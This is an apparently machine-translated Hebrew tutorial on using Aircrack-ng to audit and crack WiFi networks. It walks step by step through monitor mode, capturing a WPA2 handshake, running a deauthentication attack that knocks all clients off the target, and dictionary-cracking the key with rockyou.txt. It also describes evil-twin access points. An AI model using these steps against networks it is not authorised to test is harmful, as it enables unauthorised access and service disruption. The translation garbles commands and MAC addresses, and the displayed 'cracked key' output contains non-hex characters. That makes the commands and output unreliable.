כיצד להשתמש ב- Aircrack-ng

How Use Aircrack Ng



לרוב, אנשים אף פעם לא חושבים על הרשת שאליה הם מחוברים. הם אף פעם לא חושבים עד כמה הרשת הזו מאובטחת וכמה הם מסכנים את הנתונים הסודיים שלהם על בסיס יומי. אתה יכול להפעיל בדיקות פגיעות ברשתות ה- WiFi שלך באמצעות כלי רב עוצמה בשם Aircrack-ng ו- Wireshark. Wireshark משמש לניטור פעילות הרשת. Aircrack-ng דומה יותר לכלי אגרסיבי המאפשר לך לפרוץ ולתת גישה לחיבורים אלחוטיים. חשיבה כפולש הייתה תמיד הדרך הבטוחה ביותר להגן על עצמך מפני פריצה. ייתכן שתוכל להבין את הפעולות המדויקות שיבוצע לפולש כדי לקבל גישה למערכת שלך על ידי למידה על סקר אוויר. לאחר מכן תוכל לבצע בדיקות תאימות במערכת שלך כדי לוודא שהיא לא בטוחה.

Aircrack-ng הוא סט מלא של תוכנות המיועדות לבדיקת אבטחת רשת WiFi. זה לא רק כלי אחד אלא אוסף של כלים, שכל אחד מהם מבצע מטרה מסוימת. ניתן לעבוד על תחומים שונים של אבטחת wifi, כמו ניטור נקודת הגישה, בדיקה, תקיפת הרשת, פיצוח רשת ה- WiFi ובדיקתה. מטרת המפתח של Aircrack היא ליירט את המנות ולפענח את ה- hash כדי לשבור את הסיסמאות. הוא תומך כמעט בכל הממשקים האלחוטיים החדשים. Aircrack-ng היא גרסה משופרת של חבילת כלים מיושנת Aircrack, ng מתייחס ל- דור חדש . כמה מהכלים המדהימים שעובדים יחד בלקיחת משימה גדולה יותר.







איירמון:

Airmon-ng כלול בערכת aircrack-ng המציבה את כרטיס ממשק הרשת במצב הצג. כרטיסי רשת יקבלו בדרך כלל רק מנות הממוקדות עבורן כהגדרתן בכתובת ה- MAC של ה- NIC, אך עם airmon-ng, כל המנות האלחוטיות, בין אם הן ממוקדות עבורן ובין אם לאו, יתקבלו גם הן. אתה אמור להיות מסוגל לתפוס את המנות האלה מבלי לקשר או לאמת את נקודת הגישה. הוא משמש לבדיקת הסטטוס של נקודת גישה על ידי הכנסת ממשק הרשת למצב צג. ראשית יש להגדיר את הכרטיסים האלחוטיים כדי להפעיל את מצב הצג, ואז להרוג את כל תהליכי הרקע אם אתה חושב שכל תהליך מפריע לו. לאחר סיום התהליכים, ניתן להפעיל את מצב הצג בממשק האלחוטי על ידי הפעלת הפקודה שלהלן:



[מוגן בדוא'ל]: ~ $סודוairmon-ng התחל wlan0#

תוכל גם להשבית את מצב הצג על ידי עצירת ה- airmon-ng בכל עת באמצעות הפקודה הבאה:

[מוגן בדוא'ל]: ~ $סודוairmon-ng stop wlan0#

Airodump:

Airodump-ng משמש לרשימת כל הרשתות המקיפות אותנו ולצפות במידע יקר אודותיהן. הפונקציונליות הבסיסית של airodump-ng היא לרחרח מנות, כך שבעצם היא מתוכנתת לתפוס את כל המנות מסביבנו תוך הכנסת למצב הצג. נפעיל אותו כנגד כל החיבורים סביבנו ונאסוף נתונים כמו מספר הלקוחות המחוברים לרשת, כתובות ה- Mac המתאימות להם, סגנון ההצפנה ושמות הערוצים ואז נתחיל למקד את רשת היעד שלנו.

על ידי הקלדת הפקודה airodump-ng ומתן שם ממשק הרשת כפרמטר, נוכל להפעיל כלי זה. הוא יפרט את כל נקודות הגישה, כמות מנות הנתונים, שיטות הצפנה ואימות בהן נעשה שימוש ושם הרשת (ESSID). מנקודת מבט של פריצה, כתובות ה- mac הן השדות החשובים ביותר.

[מוגן בדוא'ל]: ~ $סודוairodump-ng wlx0mon

קראק אוויר:

Aircrack משמש לפיצוח סיסמאות. לאחר לכידת כל החבילות באמצעות airodump, נוכל לפצח את המפתח על ידי פקק אוויר. הוא סדק את המפתחות האלה באמצעות שתי שיטות PTW ו- FMS. גישת PTW נעשית בשני שלבים. בהתחלה משתמשים רק במנות ARP, ורק אז, אם המפתח לא נסדק לאחר החיפוש, הוא משתמש בכל שאר המנות שנתפסו. נקודת פלוס בגישת PTW היא שלא כל המנות משמשות לפיצוח. בגישה השנייה, כלומר, FMS, אנו משתמשים הן במודלים הסטטיסטיים והן באלגו הכוח האכזרי לפיצוח המפתח. ניתן להשתמש גם בשיטת מילון.

משחק אוויר:

Airplay-ng מציגה מנות לרשת אלחוטית כדי ליצור או להאיץ תנועה. ניתן ללכוד מנות משני מקורות שונים על ידי משחק אוויר. הראשונה היא הרשת החיה, והשנייה היא המנות מקובץ ה- pcap שכבר קיים. Airplay-ng שימושי במהלך מתקפת אימות אימות המכוונת לנקודת גישה אלחוטית ומשתמש. יתר על כן, אתה יכול לבצע כמה התקפות כמו התקפת קפה לאטה עם airplay-ng, כלי המאפשר לך לקבל מפתח מהמערכת של הלקוח. אתה יכול להשיג זאת על ידי תפיסת חבילת ARP ולאחר מכן מניפולציה עליה ושליחתה חזרה למערכת. לאחר מכן הלקוח ייצור חבילה שניתן ללכוד על ידי airodump ו- airrack סדק את המפתח מאותה מנה. כמה אפשרויות תקיפה אחרות של airplay-ng כוללות צ'ופצ'ופ, קטעי פרימה וכו '.

בסיס אוויר:

Airbase-ng משמש להפיכת מחשב של פולש לנקודת חיבור שנפגעת עבור אחרים שאפשר לקשר אליהם. באמצעות Airbase-ng, אתה יכול לטעון שאתה נקודת גישה חוקית ולבצע התקפות איש באמצע על מחשבים המחוברים לרשת שלך. התקפות מסוג זה מכונות התקפות תאומות רעות. לא ניתן למשתמשים בסיסיים להבחין בין נקודת גישה חוקית לנקודת גישה מזויפת. אז איום התאומים המרושע הוא בין האיומים האלחוטיים המאיימים ביותר שעומדים בפנינו כיום.

Airolib-ng:

Airolib מאיץ את תהליך הפריצה על ידי אחסון וניהול רשימות הסיסמאות ונקודת הגישה. מערכת ניהול מסדי הנתונים שבה משתמשת תוכנית זו היא SQLite3, הזמינה לרוב בכל הפלטפורמות. פיצוח סיסמאות כולל את החישוב של מפתח האב הזוגי באמצעותו מופק המפתח החולף הפרטי (PTK). באמצעות PTK, אתה יכול לקבוע את קוד זיהוי הודעת המסגרת (MIC) לחבילה נתונה ולמצוא תיאורטית את ה- MIC דומה לחבילה, כך שאם ה- PTK צדק, גם ה- PMK צדק.

כדי לראות את רשימות הסיסמאות וגישה לרשתות המאוחסנות במסד הנתונים, הקלד את הפקודה הבאה:

[מוגן בדוא'ל]: ~ $סודובסיס הנתונים של airolib-ng-נתונים

כאן בסיס הנתונים הוא ה- db שאליו ברצונך לגשת או ליצור, ו- –stats היא הפעולה שברצונך לבצע בה. אתה יכול לבצע מספר פעולות בשדות מסד הנתונים, כמו מתן עדיפות מקסימלית לאיזה SSID או משהו. כדי להשתמש ב- airolib-ng עם aircrack-ng, הזן את הפקודה הבאה:

[מוגן בדוא'ל]: ~ $סודוairrack-ng-rtestdatabase wpa2.eapol.cap

כאן אנו משתמשים ב- PMK שחושב כבר ב- מאגר הבדיקות להאיץ את תהליך פיצוח הסיסמאות.

פיצוח WPA/WPA2 באמצעות Aircrack-ng:

בואו נסתכל על דוגמה קטנה של מה שיכול לעשות airrack-ng בעזרת כמה מהכלים המדהימים שלה. נסדק מפתח משותף מראש של רשת WPA/WPA2 בשיטת מילון.

הדבר הראשון שעלינו לעשות הוא לרשום ממשקי רשת התומכים במצב צג. ניתן לעשות זאת באמצעות הפקודה הבאה:

[מוגן בדוא'ל]: ~ $סודוairmon-ng

ערכת שבבים של נהג ממשק PHY

Phy0 wlx0 rtl8xxxu Realtek Semiconductor Corp.

אנו יכולים לראות ממשק; כעת, עלינו להכניס את ממשק הרשת שמצאנו (wlx0) למצב צג באמצעות הפקודה הבאה:

[מוגן בדוא'ל]: ~ $סודוairmon-ng התחל wlx0

זה אפשר מצב צג בממשק שנקרא wlx0mon .

כעת עלינו להתחיל להאזין לשידורים של נתבים סמוכים באמצעות ממשק הרשת שלנו שהכנסנו למצב צג.

[מוגן בדוא'ל]: ~ $סודוairodump-ng wlx0mon

צ'5 ][חלף:30ש][ 2020-12-02 00:17



משואות BSSID PWR#Data, #/s CH MB ENC CIPHER AUTH ESSID



E4: 6F:13: 04: CE:31 -ארבע חמש 62 27 0 154e WPA2 CCMP PSK CrackIt

C4: E9:84:76:10:לִהיוֹת-63 77 0 0 654e. WPA2 CCMP PSK Hackme

C8: 3A:35: A0: 4E: 01-63 84 0 0 854e WPA2 CCMP PSK Net07

74:נותן:88: FA:38: 02-68 28 2 0 אחת עשרה54e WPA2 CCMP PSK TP-Link_3802



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:315C: 3A:ארבע חמש: D7: EA: 8B -3 0- 1 ה8 5

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -331e- 6e0 3

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -35 0-1 0 6

E4: 6F:13: 04: CE:31לִפנֵי הַסְפִירָה:91: B5: F8: 7E: D5 -390e-1 1002 13

רשת היעד שלנו היא סדוק במקרה זה, שפועל כעת בערוץ 1.

כאן על מנת לפצח את הסיסמה של רשת היעד, עלינו ללכוד לחיצת יד 4-כיוונית, המתרחשת כאשר מכשיר מנסה להתחבר לרשת. אנו יכולים ללכוד אותו באמצעות הפקודה הבאה:

[מוגן בדוא'ל]: ~ $סודוairodump-ng 1-bssid E4: 6F:13: 04: CE:31 /בית wlx0

: ערוץ

–בס : Bssid של רשת היעד

: שם הספרייה שבה יוצב קובץ ה- pcap

כעת עלינו לחכות עד שמכשיר יתחבר לרשת, אך יש דרך טובה יותר ללכוד לחיצת יד. אנו יכולים לאמת את המכשירים ל- AP באמצעות מתקפת אימות אימות באמצעות הפקודה הבאה:

[מוגן בדוא'ל]: ~ $סודומשחק אוויר-ng-0 E4: 6F:13: 04: CE:31

ל : Bssid של רשת היעד

-0 : מתקפת אימות

ניתקנו את כל המכשירים, ועכשיו עלינו לחכות למכשיר שיתחבר לרשת.

צ'1 ][חלף:30ש][ 2020-12-02 00:02][לחיצת יד WPA: E4: 6F:13: 04: CE:31



משואות BSSID PWR RXQ#Data, #/s CH MB ENC CIPHER AUTH E



E4: 6F:13: 04: CE:31 -47 1 228 807 36 154th WPA2 CCMP PSK P



BSSID STATION PWR Rate Lost Frames Probe



E4: 6F:13: 04: CE:31לִפנֵי הַסְפִירָה:91: B5: F8: 7E: D5 -35 0-1 0 1

E4: 6F:13: 04: CE:315C: 3A:ארבע חמש: D7: EA: 8B -290e- 1e0 22

E4: 6F:13: 04: CE:31 88:28: B3:30:27: 7E -310e-1 0 32

E4: 6F:13: 04: CE:31C4:67: D3: C2: CD: D7 -350e- 6e263 708CrackIt

E4: 6F:13: 04: CE:31D4: 6A: 6A:99: ED: E3 -350e- 0e0 86

E4: 6F:13: 04: CE:315C: C3: 07:56:61: EF -37 0- 1 ה0 1

קיבלנו מכה, ובהסתכלות בפינה הימנית העליונה ממש ליד הזמן, אנו יכולים לראות לחיצת יד שנלכדה. עיין כעת בתיקייה שצוינה ( /בית במקרה שלנו) עבור א .pcap קוֹבֶץ.

על מנת לפצח את מפתח WPA, נוכל להשתמש בפקודה הבאה:

[מוגן בדוא'ל]: ~ $סודוairrack-ng-a2 rockyou.txtE4: 6F:13: 04: CE:31לחיצת יד.כובע

ב: Bssid של רשת היעד

-a2: מצב WPA2

Rockyou.txt: המילוןקוֹבֶץבשימוש

לחיצת יד.כובע: הקוֹבֶץ איזהמכיל לחיצת יד שנלכדה

Aircrack-ng1.2בטא 3

[00:01:49] 10566מפתחות נבדקו(1017.96ל/ש)

מפתח שנמצא! [תפסת אותי]

מפתח ראשי: 8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B 7B 6D

0C 06 08 ED BC 6B H7 J8 K1 A0896B 7B B F7 6Fחמישיםג


מפתח חולף: 4D C4 5R 6T76 996G 7H 8D EC

H7 J8 K1 A0896B 7B 6D AF 5B 8D 2D A0896B

A5 BD K1 A0896B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A089

8D EC 0C EA D2 BC 6B H7 J8 K1 A0896B

MAC: CB 5A F8 CE62B2 1B F7 6FחמישיםC025 62E9 5D71

המפתח לרשת היעד שלנו נסדק בהצלחה.

סיכום:

רשתות אלחוטיות נמצאות בכל מקום, המשמשות כל חברה, החל מעובדים המשתמשים בסמארטפונים ועד התקני בקרה תעשייתיים. על פי מחקר, כמעט למעלה מ -50 אחוזים מתעבורת האינטרנט תהיה באמצעות WiFi בשנת 2021. לרשתות אלחוטיות יש יתרונות רבים, תקשורת מחוץ לדלתות, גישה מהירה לאינטרנט במקומות שבהם כמעט בלתי אפשרי להניח חוטים, יכולה להרחיב את הרשת ללא התקנת כבלים. לכל משתמש אחר, ויכול לחבר בקלות את המכשירים הניידים שלך למשרדי הבית שלך בזמן שאתה לא שם.

למרות היתרונות הללו, ישנו סימן שאלה גדול לגבי פרטיותך ואבטחתך. כרשתות אלו; בטווח השידורים של הנתבים פתוחים לכולם, ניתן לתקוף אותם בקלות ונתונים שלך עלולים להתפשר בקלות. לדוגמה, אם אתה מחובר לאינטרנט wifi ציבורי כלשהו, ​​כל מי שמחובר לרשת זו יכול לבדוק בקלות את תעבורת הרשת שלך בעזרת קצת מודיעין ובעזרת כלים מדהימים הזמינים ואף לזרוק אותה.